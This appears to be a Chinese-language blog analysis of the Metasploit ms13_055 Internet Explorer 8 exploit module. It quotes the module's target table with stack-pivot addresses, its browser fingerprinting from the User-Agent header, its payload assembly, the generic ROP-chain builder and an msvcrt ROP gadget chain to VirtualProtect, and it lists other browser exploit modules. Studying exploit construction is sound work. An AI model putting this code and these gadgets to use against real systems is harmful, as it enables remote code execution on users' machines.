111   def get_payload(t)
112 if t['Rop'] == :msvcrt
113 print_status("Using msvcrt ROP")
114 esp_align = "\x81\xc4\x54\xf2\xff\xff"
115 rop_dll = 'msvcrt'
116 opts = {'target'=>'xp'}
117 else
118 print_status("Using JRE ROP")
119 esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
120 rop_dll = 'java'
121 opts = {}
122 end

  

daniel@daniel-mint ~/ms13_055 $ echo "81 c4 54 f2 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s inte
l00000000 81 C4 54 F2 FF FF add esp, 0xFFFFF254

  

daniel@daniel-mint ~/ms13_055 $ echo "81 ec f0 d8 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel
00000000 81 EC F0 D8 FF FF sub esp, 0xFFFFD8F0

  

esp_align代表的汇编语句的作用是对齐esp,即栈指针。


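 # Pick the exploit target for a client from its User-Agent string.
 #
 # @param agent [String, nil] the raw User-Agent header value; nil when the
 #   request carried no such header
 # @return the manually chosen target, the first entry of targets whose name
 #   carries both the IE major version and the OS name derived from the
 #   NT version, or nil when nothing matches
 def get_target(agent)
   # A manually selected target always wins over fingerprinting.
   return target if target.name != 'Automatic'

   # Requests may arrive without a User-Agent header; treat that as an
   # unknown client rather than raising NoMethodError on nil.
   agent = agent.to_s
   nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
   ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

   # Only the two NT versions that have a 'Targets' entry map to an OS name.
   os_name = case nt
             when '5.1' then 'Windows XP SP3'
             when '6.1' then 'Windows 7'
             end

   # No IE version, or an NT version without a 'Targets' entry, means no
   # target; bail out here so the name check below never sees a nil os_name
   # (include?(nil) would raise TypeError instead of yielding the 404 path).
   return nil if ie.empty? || os_name.nil?

   ie_name = "IE #{ie}"
   targets.find { |t| t.name.include?(ie_name) && t.name.include?(os_name) }
 end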

  

188   def on_request_uri(cli, request)
189 agent = request.headers['User-Agent']
190 t = get_target(agent)

  

当远程的网页客户端发出HTTP请求页面时,get_target会根据请求Header中的User-Agent信息来识别客户端操作系统以及浏览器的版本,然后根据预设的Targets返回与该版本对应的数据。

 52       'Targets'        =>
53 [
54 [ 'Automatic', {} ],
55 [
56 'IE 8 on Windows XP SP3',
57 {
58 'Rop' => :msvcrt,
59 'Pivot' => 0x77c15ed5, # xchg eax, esp; ret
60 'Align' => 0x77c4d801 # add esp, 0x2c; ret
61 }
62 ],
63 [
64 'IE 8 on Windows 7',
65 {
66 'Rop' => :jre,
67 'Pivot' => 0x7c348b05, # xchg eax, esp; ret
68 'Align' => 0x7C3445F8 # add esp, 0x2c; ret
69 }
70 ]
71 ],

  

如果当前的系统不支持,就会返回404页面。


# Assemble the buffer handed to the ROP generator for the chosen target.
#
# The buffer is a six-byte stack-adjust stub, the encoded payload and
# 12000 bytes of alphabetic filler; which stub, gadget DLL and selector
# options are used depends on the target's 'Rop' entry.
#
# @param t the selected target; its 'Rop' entry is :msvcrt or :jre
# @return whatever generate_rop_payload returns for the selected DLL
def get_payload(t)
  rop_dll, esp_align, opts =
    case t['Rop']
    when :msvcrt
      print_status("Using msvcrt ROP")
      # add esp, 0xFFFFF254 (i.e. add esp, -3500)
      ['msvcrt', "\x81\xc4\x54\xf2\xff\xff", {'target'=>'xp'}]
    else
      print_status("Using JRE ROP")
      # sub esp, 0xFFFFD8F0 (i.e. sub esp, -10000)
      ['java', "\x81\xEC\xF0\xD8\xFF\xFF", {}]
    end

  buffer = esp_align + payload.encoded + rand_text_alpha(12000)
  generate_rop_payload(rop_dll, buffer, opts)
end

  

generate_rop_payload

 # Build pivot + expanded ROP chain + payload for the named gadget set.
 #
 # @param rop [String] name of the chain handed to select_rop
 # @param payload [String] the bytes appended after the packed chain
 # @param opts [Hash] optional 'nop' (sled generator), 'badchars', 'pivot',
 #   'target' and 'base'; a missing or nil entry falls back to nil or ''
 # @return [String] pivot + packed chain + payload
 # @raise [RuntimeError] when the packed chain is empty
 def generate_rop_payload(rop, payload, opts={})
   setting = ->(key, default) { opts[key] || default }
   nop      = setting.call('nop', nil)
   badchars = setting.call('badchars', '')
   pivot    = setting.call('pivot', '')
   target   = setting.call('target', '')
   base     = setting.call('base', nil)

   gadgets = select_rop(rop, {'target'=>target, 'base'=>base})

   # Turn each reserved word into a concrete 32-bit value and pack the
   # whole chain as little-endian DWORDs; any other entry is kept as-is.
   chain = gadgets.map { |entry|
     case entry
     when :nop
       nop ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090
     when :junk
       Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
     when :size
       payload.length
     when :unsafe_negate_size
       get_unsafe_size(payload.length)
     when :safe_negate_size
       get_safe_size(payload.length)
     else
       entry
     end
   }.pack("V*")

   raise RuntimeError, "No ROP chain generated successfully" if chain.empty?

   pivot + chain + payload
 end

  

会从data目录下查找预先定义好的[module].xml文件,将gadgets中的保留字展开为实际数值,然后以 pivot + gadgets + payload 的形式拼接后返回。

  3 <rop>
4 <compatibility>
5 <target>WINDOWS XP SP2</target>
6 <target>WINDOWS XP SP3</target>
7 </compatibility>
8
9 <gadgets base="0x77c10000">
10 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
11 <gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
12 <gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
13 <gadget value="junk">JUNK</gadget>
14 <gadget offset="0x0001362c">POP EBX # RETN</gadget>
15 <gadget offset="0x0004d9bb">Writable location</gadget>
16 <gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
17 <gadget offset="0x00040d13">POP EDX # RETN</gadget>
18 <gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
19 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
20 <gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
21 <gadget value="junk">JUNK</gadget>
22 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
23 <gadget offset="0x0002ee15">POP EBP # RETN</gadget>
24 <gadget offset="0x0002ee15">skip 4 bytes</gadget>
25 <gadget offset="0x0002eeef">POP ECX # RETN</gadget>
26 <gadget offset="0x0004d9bb">Writable location</gadget>
27 <gadget offset="0x0001a88c">POP EDI # RETN</gadget>
28 <gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
29 <gadget offset="0x0002a184">POP ESI # RETN</gadget>
30 <gadget offset="0x0001aacc">JMP [EAX]</gadget>
31 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
32 <gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
33 <gadget offset="0x00002df9">PUSHAD # RETN</gadget>
34 <gadget offset="0x00025459">ptr to 'push esp # ret</gadget>
35 </gadgets>
36 </rop>

  


在Windows下Browser相关的漏洞模块中查找generate_rop_payload的调用:

daniel@daniel-mint ~/msf/metasploit-framework/modules/exploits/windows/browser $ grep generate_rop_payload *.rb -n
adobe_flash_mp4_cprt.rb:148: code = generate_rop_payload(rop_name, code, {'target'=>rop_target})
adobe_flash_otf_font.rb:100: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.257', 'pivot'=>pivot})
adobe_flash_otf_font.rb:110: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.265', 'pivot'=>pivot})
adobe_flash_otf_font.rb:120: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.268', 'pivot'=>pivot})
adobe_flash_otf_font.rb:130: p = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
adobe_flashplayer_flash10o.rb:194: p = generate_rop_payload('java', payload.encoded)
adobe_flash_rtmp.rb:135: code << generate_rop_payload('msvcrt', p, {'target'=>'xp'})
adobe_toolbutton.rb:77: rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))
adobe_toolbutton.rb:78: rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))
aladdin_choosefilepath_bof.rb:147: p = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp'})
apple_quicktime_mime_type.rb:153: code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
apple_quicktime_rdrf.rb:65: p = generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'})
crystal_reports_printcontrol.rb:178: rop_payload = generate_rop_payload('java', code, {'pivot' => [t['Pivot']].pack("V")})
hp_loadrunner_writefilebinary.rb:207: rop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
ie_cbutton_uaf.rb:148: rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})
ie_cbutton_uaf.rb:150: rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})
ie_cbutton_uaf.rb:153: rop_payload = generate_rop_payload('java', java_align + code)
ie_cgenericelement_uaf.rb:126: rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
ie_cgenericelement_uaf.rb:128: rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
ie_cgenericelement_uaf.rb:136: rop_payload = generate_rop_payload('java', code)
ie_execcommand_uaf.rb:139: rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
ie_execcommand_uaf.rb:158: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ie_setmousecapture_uaf.rb:98: rop = generate_rop_payload('hxds', code, { 'target'=>'2007' })
ie_setmousecapture_uaf.rb:112: rop = generate_rop_payload('hxds', code, { 'target'=>'2010' })
indusoft_issymbol_internationalseparator.rb:219: rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
indusoft_issymbol_internationalseparator.rb:231: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
inotes_dwa85w_bof.rb:204: rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})#{'pivot'=>stack_pivot, 'target'=>'xp'})
mozilla_firefox_onreadystatechange.rb:108: code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
mozilla_firefox_xmlserializer.rb:110: code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
ms10_002_ie_object.rb:248: rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'xp'})
ms10_002_ie_object.rb:250: rop_payload = generate_rop_payload('java', p)
ms11_050_mshtml_cobjectelement.rb:182: rop_payload = generate_rop_payload('java', p)
ms11_081_option.rb:137: rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
ms11_081_option.rb:144: rop_payload = generate_rop_payload('java', '')
ms12_004_midi.rb:519: generate_rop_payload('msvcrt', p, {'pivot'=>padding, 'target'=>'xp'})
ms12_037_same_id.rb:133: rop = generate_rop_payload('msvcrt', '', {'target'=>'xp', 'pivot'=>pivot})
ms12_037_same_id.rb:137: rop = generate_rop_payload('java', '', {'pivot'=>pivot})
ms13_009_ie_slayoutrun_uaf.rb:128: rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
ms13_037_svg_dashstyle.rb:218: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms13_055_canchor.rb:125: generate_rop_payload(rop_dll, p, opts)
ms13_059_cflatmarkuppointer.rb:120: generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms13_069_caret.rb:97: p << generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
ms13_080_cdisplaypointer.rb:157: rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:174: rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:186: rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:197: rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
ms13_090_cardspacesigninhelper.rb:108: rop_payload = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp', 'pivot' => stack_pivot})
ms14_012_textrange.rb:85: p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup})
msxml_get_definition_code_exec.rb:189: rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})
msxml_get_definition_code_exec.rb:193: rop = generate_rop_payload('java','',{'pivot'=>adjust})
novell_groupwise_gwcls1_actvx.rb:207: rop_payload = generate_rop_payload('msvcrt', '', 'target'=>'xp') # Mapped at 0x0c0c07ea
novell_groupwise_gwcls1_actvx.rb:217: rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea
ntr_activex_check_bof.rb:270: rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})
ntr_activex_check_bof.rb:274: rop_payload = generate_rop_payload('java', code)
quickr_qp2_bof.rb:202: rop_payload = generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
siemens_solid_edge_selistctrlx.rb:398: return generate_rop_payload('msvcrt', payload.encoded, {'pivot'=> fake_memory, 'target'=>'xp'})
vlc_amv.rb:143: code = generate_rop_payload('java', payload.encoded)

  
